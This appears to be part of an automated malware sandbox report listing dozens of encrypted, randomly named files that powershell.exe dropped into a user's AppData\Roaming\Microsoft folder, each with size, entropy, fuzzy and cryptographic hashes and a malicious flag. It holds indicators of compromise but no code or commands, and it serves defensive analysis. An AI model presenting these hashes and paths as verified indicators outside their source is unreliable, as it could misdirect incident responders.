                                                                                                    Entropy (8bit):7.998913129135071
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:YKjk0VTkNXgsDI4Fjk0WEa0s8+2Q6X39am1ixBfF7BhjX0FBoPZ2Ii:YUjxMX1DI4Fo0Zat8+U0m1ud7BVXOBoE
                                                                                                    MD5:53A024C52674992B09D74E2A8A10D9AC
                                                                                                    SHA1:D20CA4896590133DFDCDB16ECBE8CAB4D774E2E0
                                                                                                    SHA-256:701C6662FE7D5EC3CB758F6EB77A28440F1F603D8A4264C9ECF6A71930571460
                                                                                                    SHA-512:0AB48F3F7E0145CB362FDF260CF23E306DEC4F5C98D094907A0138F014C2463B6C39DE585D9A20DA80A4E17FEF6D285FD405066054CE605B3EA1D179B66E5218
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GlOhxqcnumdRbSM.XNFbAQxVOTE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126909
                                                                                                    Entropy (8bit):7.998731518461136
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CZonXARmeoPWQZCnFvTFsbNUEZRt8zNJJeStJPzt:CSnQRmeRXFriiE9qNJYSbLt
                                                                                                    MD5:0DBDFE9C9F817700B038355A0E201AF1
                                                                                                    SHA1:0B50DB946E647E19C80123EDB3026AA4E2873C58
                                                                                                    SHA-256:4A7D40D2834A67BE3E6EAA6AAD2578336801A4819BAFA4E912065863C8CD6608
                                                                                                    SHA-512:82125B633076756771F9E9DCE35CBA91DE7C77E875FF43D349C9A380F9420864CAE354F6BAEE55B1B88C1CDFCBE8699E1158050F0EEF80783ED86FAA61E84ECD
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GwlaJKWHQYV.iEBDvALgUXGYQz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):188538
                                                                                                    Entropy (8bit):7.999106868441715
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:s+S4hyDuS8443kidsq0OVaF8vLVbobabJJkLyieKZSkOsdU2Tz1R7Rmj35BW6ck8:sSfkc0H2LYabJZieK3xdLTH7RmFp8
                                                                                                    MD5:86E027972AB7C76CD51DEF1ADBD57462
                                                                                                    SHA1:CC0D5202BB0979D0FF65486A1E543B0F0C0B048F
                                                                                                    SHA-256:2B7186BB53F0DDE5B44DAFC2F85CADDC16A13E0A8CCF552E35D667CCA0DE8825
                                                                                                    SHA-512:EF50C60CA14126FBB51EC526E6721477A063EAF51E1DB1501E388D9D857B6BF2B00D643AA8D3E26E0A0FFBD1060659F34B0300427703D706AD3DC19D9744F88A
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\HguaokTAjUxvfBhViR.LoIMASDzvOQmCVFjgxt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):175934
                                                                                                    Entropy (8bit):7.999111448105421
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:u1gOmVP+2awu1cuOW87+WhfkvgKFCqEeCWpkw5A+ykThjqwX/IQgO:0NUPMH1/Op7LkYIVEeCWpfx1TNv/
                                                                                                    MD5:53C9EA885DDEAF32388C773FC6CE8F11
                                                                                                    SHA1:BF984558C95B2617A41171AE19747913ACA5B4A6
                                                                                                    SHA-256:03450805D3988F534CB982F40437C91DB70E56CF4E2D42D04C1B1ED20B22A990
                                                                                                    SHA-512:ADA1002A9C5E87B18B11EFAC17480808E2961496AEDE7ABBBC0382E77D6BCD40BEB64387A5AA2EA2C5676D3F2067029829E443A915DDFAF379541E6D05AB0B90
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\HvBdpwFfxSjN.oevDUxZGEd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124031
                                                                                                    Entropy (8bit):7.998254399551055
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xVmUR0RGFwf2FODioqaekLFqiBex9rN0FMIWoN0uF59:xV4TfKo08DB2n0FMXw0uF59
                                                                                                    MD5:1C00220A973FC5B990C9340DF274D51B
                                                                                                    SHA1:30146191046976FF719CEB5AB83583918AD3F34C
                                                                                                    SHA-256:7FFD153BF430AEF6296BF7082D562256D5864AB1EE6861A2CDC014290F4A3907
                                                                                                    SHA-512:3BB6E87DF8817E074CDC61E8E7F33087869026FDFF1C2D0CDB061C58C88393E37583D4CB8498892119AB84D96F4DA62C29165280E60D114FEB15A58E3FB19658
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\IgkbYrEeqtUHAWB.oveGZKBsrXjnqkgWlF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105931
                                                                                                    Entropy (8bit):7.998311889316311
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Wp/Q8z2vdHQkUkvDvGg0y18nP9zfTSxyaKTb6ZOG+PU7nKMvpOu6UzjPQ13RzAGZ:WK8z2lwgDvGqcPtQUbq3zKh0zgRcxWDd
                                                                                                    MD5:1A604E7C3B65548510612F92AD42F0F9
                                                                                                    SHA1:96A59ED085FDE70044418308D7D6CEF433236A52
                                                                                                    SHA-256:97CEBD4305658A90827A2A0300112B777046849412ED61CD49BE42068633C33F
                                                                                                    SHA-512:DAE7EAAE032C6DA92E7B3F638248CD89C0B5556AA6A0712DD3A419DBA577A19B7D8914D33A7EAAC266FBDFDC3990ECF15D412DE0390C0DD1681C7D62C8BE3A88
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JDmbluHkMAvRQPzwjN.hbTZiSnNFPrd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121848
                                                                                                    Entropy (8bit):7.998652191562647
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:6673LbDBqxxOWs3lUgVsxyi966yql9RJT7rVgek:6CWmlUgVOyieCg1
                                                                                                    MD5:9ABF47842ADADEE81BA235C59CE3B356
                                                                                                    SHA1:086B26B3930FBE24F01F04B9F508AB86777C0F62
                                                                                                    SHA-256:4D163A589DC77C8415472645A7EF75B52A6DAD54E50C5519A399EAE1DE80FF97
                                                                                                    SHA-512:383E86738268F9B27E35752DA3B54EE2B93A48F755DDF683572B51A2C71541A9899A5C72E351072C4582B4CBCAD37C238619D7844AF1015C9F13F3A9F75C0861
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JFYKMsSjbVLQNdTk.HpWmvDgAnrchQt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):118337
                                                                                                    Entropy (8bit):7.9984047476922875
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:02ozL1TbZ5JzhuOA5wTiYt/Kmqdl1vIAWuU:02ohbVzMY9t/KmqTkF
                                                                                                    MD5:3A1C1510BA4E81B11D0026927F962587
                                                                                                    SHA1:F38586EC4751F2B77BE8FC005FD323D72B926AE0
                                                                                                    SHA-256:64C7DFDC7204D44CC4ED00157063718D77A0326B411AE656A41270697CE4AA76
                                                                                                    SHA-512:1CA3998A18B5E4C53AB3F23B54D466D5EEC925F36FE41C7446FFE152940F28811F32616A36AFCF3F3EEC3043F67DBC8C6B115289E9816E9AADBECF51D835F397
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JhzcXlaPvHxmyw.TRmXshlKrzvDGiBycP
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):162222
                                                                                                    Entropy (8bit):7.999055928822681
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:t+vbh1avfHzpIKaLeeFEU13WUuwUe1IIS5GGarzbKY4j5UKfEKLZCG4AIbAwe74:e8H9gLdF/hWLF01rPKZj5lDLZCG4Tbt
                                                                                                    MD5:A2E7426D0361C6E03822C847FEC26D8C
                                                                                                    SHA1:1893776B3FE4F93A04FB58AACAC4545ED8F32E92
                                                                                                    SHA-256:E658586A3CFE242EDDB127BE0F24AD5415083F571C987203AE80F1C445F287D5
                                                                                                    SHA-512:D2D60BF43D705A6C734CFE825297EEE9E98D4CF0CECAF947CB8B9C5380C460287E85C859616864B598B5B5D348FE5B37356AFE0C3D711AC96913601B6B4B3EFB
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JlvCxXarWEkReOwQ.isJHCgwaAtNj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61992
                                                                                                    Entropy (8bit):7.997273463525382
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:XUnyBr+ZgODHsZwHjCUo7KwMhRpNiWyOqY2:XuyBSCOrL6+pNQY2
                                                                                                    MD5:5C6E5615EF3BDCFF02AA74890A6DC92D
                                                                                                    SHA1:BC5BA66438435D621231E814899917C5140C63E9
                                                                                                    SHA-256:43B0580598B56ABA052498B85ED3F92EC9B73A61C7D35D36E85D34469FE37CF1
                                                                                                    SHA-512:FB0922AA9F604456D6BF55A8B89FB1EDF0A8FAE48C7413C19F50ACE190178CD22D83362ADFB39078942D29005578046DA3318E3F889A5E5A4CA44B49BDE6D860
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JmgZUkCGOnwBtYK.caxjFATNnCMOJfIuB
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194052
                                                                                                    Entropy (8bit):7.999045490524826
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:vZngwf0HpYvNMo+Y7rNbTGZ2zBlXRKXb+CRgX42Qz9QrqBSEE57QuBMGpNx6xd9/:vZti4rRNztub9Rgiz9lSEE50ypz6xd9/
                                                                                                    MD5:6B33D14D93E04C5A56B5FC25824AB9B2
                                                                                                    SHA1:9D374790D2116B060A7283CB0B12EDAB060BA641
                                                                                                    SHA-256:2C12DF6DC272891D073CA0E2978347FF71678E0D904FF7FE8E31699BB1DBD53E
                                                                                                    SHA-512:3F7D504B17369BB87F9B5EDAE73C4633C6E0AE70A28F9297936846E44477F4F5E9178BBAC60683397D80AD15D730D094B1AF96BE3E8E209E1399AC5EBFD5697E
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JncQjmMbqKTUzr.HNAmYrCiyGUOblqLox
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161532
                                                                                                    Entropy (8bit):7.998803328719341
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:h6FHIBLqSFxsjO+Y+UDPHED5oQzGRV498vYf9mK5FwkJgwE7rjD:oHIFrFx4Op37H2GRV422wKfwkJLcrv
                                                                                                    MD5:2D1D47BF5BB427C5F71A9DA7AC7F9F49
                                                                                                    SHA1:4A8158DA83A104770BA113D74CC483D4062E1C14
                                                                                                    SHA-256:57C7579F74B7726C6128728E45932E1B2F02A42898FA49B3E64D9CDD485D9B62
                                                                                                    SHA-512:10AB1378776F9142280CA855552CE664A58844E6C534A41A369836734B2EF3608285F5854F9A93D3629A85D1EF6E185EB9B94784B9AF4C960615CA2B1DDDE64F
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JtxafTOLCmGpXon.LuSVrUEzvH
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124427
                                                                                                    Entropy (8bit):7.998477108923858
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:bltdb6Ef4hDeAaXFXWD0Z/SblBZQyX6Gu9mA+OH6pg/ZpV5he:Ey49eX20Z/aTZQ5M1eRphe
                                                                                                    MD5:B983433C9A89725B9C4E7B1415752E88
                                                                                                    SHA1:118E4CFD9D4795A9F1CA5727E6B5ECE8578F19AF
                                                                                                    SHA-256:B3BC2A03ADE0654B2C3456006C41048F9933EA425D173CDD0B76ABEBC9AF3904
                                                                                                    SHA-512:B330387D11B5B1E765F6760820ECD6321D9BB62554D944CC10FD649B3EB22A2BD168310936E764948ABF5CA5459BEF7B859712583B52DEEB610F97DA6D9F87BE
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JzICspvGYNHr.rVpbfIRKceX
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):199171
                                                                                                    Entropy (8bit):7.999115570944138
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:XiuRSmF5N/0+Ot0ey/HSGdWlqyDHOpsdDYNJP:fSm/NvOmjdqLipcDYbP
                                                                                                    MD5:4B1781892CA0B628F301E3A1A992D760
                                                                                                    SHA1:00E4A0B021BF82BEF25DA791BE8B9A274EC016DD
                                                                                                    SHA-256:20EDEA881D7455D3DBF46C8CF71333ABA74B12790043E3E4BC9AEF8F951B2315
                                                                                                    SHA-512:E22D45FE7B3800CA26CD6BF2B3F9EF78DBC52EAABC280ABBA32E568ADDB46266685679DFE649D1928024F2A724170F27A5597C199FF5033A9828882A3E4B6448
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KHGtwVZTBQqYjUei.gELZdHkeSxKOzFjIh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):177413
                                                                                                    Entropy (8bit):7.99901852624988
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:KJATuJ2jJwl5B+wNpBHKKbGKt4E7WCG9g6QJakZ/DQaeowf/n0OrcGQ:DTuJ2c5BHNp8KbXD729GtmaeLPHrQ
                                                                                                    MD5:1A41DDB70BF381CCC6E84205117A1EB3
                                                                                                    SHA1:A22FE532743550BDE1D5CF2C11B686FBB952C270
                                                                                                    SHA-256:45016A88F0D2EFA414CAA726716401C9BFA568E0C06621005C23AEB6A5361144
                                                                                                    SHA-512:611AD68D7AD7405C160F4311F5618FD42B63D682B87B64EB179F04D9BD0733A2A0D24B03746F557F843D71E8448F86C94A8A18913895DFFE8BD1791B06D19856
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KORBQhiEWj.FGNnjuCxzpTisyBv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86753
                                                                                                    Entropy (8bit):7.997629558137622
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:baMJjgi5n+Rbvp2nt5mc1GnBRcgOMwQmNagcYY+MaA1/Ok6Q2Q2NuWhy0z:WMRz21m5D8BSg1wHVS+Mnr6Q2RNuWw0z
                                                                                                    MD5:59063ACBE313E252394CD92ECD162687
                                                                                                    SHA1:BC05C2FA4BF5C71BD9CD1A30F791C9BFEE6C5CB6
                                                                                                    SHA-256:308584BA5785009FB3B73F1446AFAAC494813C66FEBB5C44CC33AECFB69A6ECC
                                                                                                    SHA-512:EF8577CE4F35C0C9C49B9D629BD44C67C8E2BB348D2EA8B5DA65D5548C7F352DF194851291477D604A891E5208A9748968220D51C2F550E56D55C8A1152AAD3B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KPLJQWVbrwdC.ZyTduYaMxjG
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135882
                                                                                                    Entropy (8bit):7.998754648518999
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ZmIjCCvS5fcMHCbM0RGf9NW6W/kYrTU5NUJgYjd5agTK:HeCvUUMHVBfMMYsrIgEd5aWK
                                                                                                    MD5:F1A8F93EDA2AE7E23A3CA9CB7ADDCB82
                                                                                                    SHA1:A53322D6576A033957E7A53886729BB7F6DB1310
                                                                                                    SHA-256:AA60A608042FAB1C28287E90451896B4BD9EBC7CE660C7BB4D909DE260311238
                                                                                                    SHA-512:DF5E6B288E63408ADF9757A58184983292915524136B1AB54477D3D874367D104D3C0611FF193945F141209E6507C0423584F62F3929450F6F534D6C5817DC57
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KfqcBmRSYPI.wkHbjJsPoNZuFMKGt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75858
                                                                                                    Entropy (8bit):7.997672381284279
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:kJBkuwySo5zijVpQu7yEQyLvHp1ZFggmVrrMkkE/9Ne9Mrzb+Rgc:FkA32EQOfp1ZFkVrrT7/WJ9
                                                                                                    MD5:1C804333DC31CB141A79BB6DAAACB39D
                                                                                                    SHA1:9EE5179E6F964529F6CEFC02EC592C95C2E58446
                                                                                                    SHA-256:0EE182B786F161EC27B531597286B39A51884107C68E70CCD198BF3599D12B87
                                                                                                    SHA-512:75882FD34995F9E68391154FE7544DAA51ACA548559AC49CD7149F97EBE2C7D50396AE93F1235DA72F60CEB560A684ED4824520BD5603D6079AFB305F29497B0
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60928
                                                                                                    Entropy (8bit):7.259541896711919
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:IdZNNZ7lUK8tIawWgypP7Vvu6ibgUrjHonU:wZW7uakM7Vm6izrjHonU
                                                                                                    MD5:14EF053A57A4ACFDB53E2E0E50CE7D64
                                                                                                    SHA1:0EA36AA28BED676CC4DFDDF0511593167A67BFBE
                                                                                                    SHA-256:326A04F6BA5D93E2ADE8D5E96C16AC0CEC570C9B67BDA85EF51D63EBA4257400
                                                                                                    SHA-512:EF6DE4D8FD1B6503CA486BEE4C240EE8FFAF8E604192481E4A0E9B9CC7F4FFF80B400E2749FC063D115E1A6F8E3DAAA6D10E818F822EEBA96515579C6B5F4B0E
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KuibdswUXWGkVCv.HmAwfRjGSeOnrZy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76418
                                                                                                    Entropy (8bit):7.997203294822315
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:NZVM5GZSN/9pD9qw/N8Gq17sYg2KGJUflwxPZfcUwDICRr1zHgcUauk3439E:egIpVhAiGJCWPZfcPICcpo43O
                                                                                                    MD5:2444A42B3822B2D7FF668EE8C9FDB222
                                                                                                    SHA1:9F7D88E051103AFE491EA28FD42DCF674A3C452C
                                                                                                    SHA-256:D8473C5662D386D430B67B86E48ABD7505685B1D96C7F132933B7C44B6365F03
                                                                                                    SHA-512:20A855F3702B4C73A5BC205AC9A674436A61CCA34C3F2CEF279B9D98569650A23B11E69B486B3BEC8ADA25CD8ED6D8054A1D7B4A2A64212684E6685D088C103C
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LJznrKxpyev.SVONxUmwgskphGZndz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):188317
                                                                                                    Entropy (8bit):7.999033855662001
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:k61j/vwjQvJt9FaAL5J3tP4w48nC6RSnsh2IieDDl2OddeUJo6+vHlEQ77VjgfJs:HjoUHBf9Pd48GsIiDUCdJgvH17VyfjDC
                                                                                                    MD5:DCE7BED8C88B7F4FD63C36C7702D0211
                                                                                                    SHA1:08ECB49199CFB1BCDF37E99539A4270B1A34FFCC
                                                                                                    SHA-256:B98F5852446A22F31BE33E8589A7C5ED41D46B73242E7CEDCF3A7B825635358A
                                                                                                    SHA-512:3C5C4BEDCBBE3E09481B13B3F6F5A1F8AB017C1914F8E7457E00247E3EC2E28A09B9C8E8B217B46B440A6748B558445AF92D4C2F52D29230E9514EDE2617A94A
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LaiGpcVSKO.fQkenRdrZDxuIm
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171437
                                                                                                    Entropy (8bit):7.999037514146617
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0zmCogHxHL6mkSbAPiJaKOdOrxNoyt0xg/PwauU66MKaHQVvBF6fOTAhQB:TgRrHtMP6SW7fw2X3aHqnX
                                                                                                    MD5:96A1093175523457F5C5E64BE1241D96
                                                                                                    SHA1:C344B63E499CDFE47EF1A4B2F5A2E6BEC970E23D
                                                                                                    SHA-256:56F1A026AACA780D3701F2B5A4B5982521223E89E15F9D761A2088FE009A412A
                                                                                                    SHA-512:ED36BD17B42C84A74B561AC3B8D600DF06E9FBD8E8CFAC4B193DD05983F6592B51365F40FA255ACE4FED4AEA64CA38373F9B72F52C8F9952EB28DBCE9DDC83F3
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LnDTWobsjHC.xTrXzAtEpWvI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):184806
                                                                                                    Entropy (8bit):7.999085224842976
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:/dY3aYG5iHKRWQgxfsAF13nLaZ9X+WCqd8xOttg3Wiy6fzrxdXtr94hY9qpI9Ebe:+BqRWQgzWZ9X+BfMPh6fzrxdXZ9EZI9J
                                                                                                    MD5:7957DDA36188A0C636FEC7903E110C6A
                                                                                                    SHA1:D522DFF3420CCADAECFAEFF96E143725750029B4
                                                                                                    SHA-256:1CBE03FF6BA8D1425A212EA502672233D6D83F80CBE3745E4B80F68D4FD7D419
                                                                                                    SHA-512:0F0484A55374B5CDBC2CE48B6A8E3D66BB8395FED801B6CCB1E5DA4D63294972B73DC4348BF555C94B91B1D4084DA8C4F6667E55F89DE7B55B18C3A19B8F2E6A
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LrfdcACiFNqYpuDs.jMOiZnLTJKldseRp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86971
                                                                                                    Entropy (8bit):7.997806654711631
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:jM/AtAUZZt+Ru7lUMCci7oGHmMfjbtkro4D0NMlsDoMNRtva56XlvY:jM/0AUZaRelfPcLHm9NbCDoMNv26Xy
                                                                                                    MD5:7164ADAC108672E62B07910B4A02C241
                                                                                                    SHA1:B08F72E826CC38750D7F0E575FABF60E465B5D39
                                                                                                    SHA-256:EF0F357C9DA4BA06685A0DC27497CCC8958507FFA407A13FCEC3F19C0852751A
                                                                                                    SHA-512:1215CFD8660C13CDDFED7A9F7A8AA59083DC5C8C6960E6F6E306DCC1CD6B4BB30C024E9A0773A5A6273BC544C18DCE9DB985427B2408366129186242A6EA332A
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LuXjgMAUnYZmoxRvp.zcLpVkReTBiDx
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87434
                                                                                                    Entropy (8bit):7.998022036844658
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:yRheaWrrcSVtogq9B2LtaDLxCD3VJkq49LxQ8r3ISrUuTtMMfm1tMTqp:IheaQDdgoLkMpuxQ8MuKr1H
                                                                                                    MD5:922A61754CDDEBD91220CF1B201FD0BA
                                                                                                    SHA1:8C23288CFACA2CC8881367F00E99E25813122C9D
                                                                                                    SHA-256:5340A91E4218DCED9739750F26D152E919641F4582835258B95D865EEABCE52D
                                                                                                    SHA-512:3F0C672FA9137085621313A0BF64664F26054AB95C6A730FFA7EED6B8BF7393FBC67E3E41E51FC3B8834CDD926C29E47A286DA28921207D0F630D80AFE0C59CB
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LyNkQoObcYpGBvaK.CIRkbJFwWdEaj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):125030
                                                                                                    Entropy (8bit):7.998526751615263
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:8fMPifWgn2Ig0/KehhnNGeLgBukUC26iy9SAhGfV:1YZn2IgKOqJmvREfV
                                                                                                    MD5:D47C84A075FD199EA68EAF70AFCDD8F7
                                                                                                    SHA1:DE9BF8D6CC5D26405BA5EEE2C323BA853D094779
                                                                                                    SHA-256:CF405665AF703E9754B9A0F408C7C7F3B907E8F79289E5ACB791EAC19B5DABBD
                                                                                                    SHA-512:0253F285E3BA1E78B8AD662910C10F6366F5F5B62814A8B4FBC712E7E3DCF189B7B9A2C7FDE3A9504D95878DFA879153B3497F58B0B8A4F762B31E60C20E5E02
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MEwsSeXUYrxJmdkRBW.bVSjvmysqIx
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126880
                                                                                                    Entropy (8bit):7.998724930562255
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:szwKHRADjg0RwtFVncXfkd+NiYj3tO6HmuGgvmQHM:5DrsfnZYj3tOGNKN
                                                                                                    MD5:0636C8216F07B64E014966E7EE033E8E
                                                                                                    SHA1:9C7E3FCA5EBD8C90A8A02A17E990F9B9FD53C412
                                                                                                    SHA-256:980C8C0007A133E578D5E57BEEFC51C88E36BD459E8B2587CF70F9F63F472ED3
                                                                                                    SHA-512:AFAE5BEA0A4941AEAC4DE38D602CB0189BCEF521FF975B33F2615096B8D4E28780B1F742B193DC9DD005AFE6EC793AD5405D58C39079430E855F01613E4953DB
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MNEcQaHKpDeryAWB.jctmgixrqodyPfQZ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):88457
                                                                                                    Entropy (8bit):7.9981008713732376
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HSAGIteP+cNvT77mgvvHFLuOTAyG3J0wlTn+A6w2wYm+Qjz:yv4edvLlfFaOkJrn5i7PQv
                                                                                                    MD5:F6BCA2A7DB40E2E4DFF9AA1AC38D686A
                                                                                                    SHA1:12963CD5665B85A35C55E90E2FB1F2CE07144463
                                                                                                    SHA-256:922583164AB90A1EC880E0E1406E36A0056F61FA99D458CA53C6D389C0E61059
                                                                                                    SHA-512:679A0CCFCD9B64E76128664EAFAE208061FB96BC23DD9F6B07797ECDCD7664483ACE1968C96DA84C301D62EAB826BAA22F184CC5831C51BE54FB5161583166F9
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MRczxHTYNfB.KlZHRUacLAQTkqdz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77628
                                                                                                    Entropy (8bit):7.997285296866579
                                                                                                    Encrypted:true
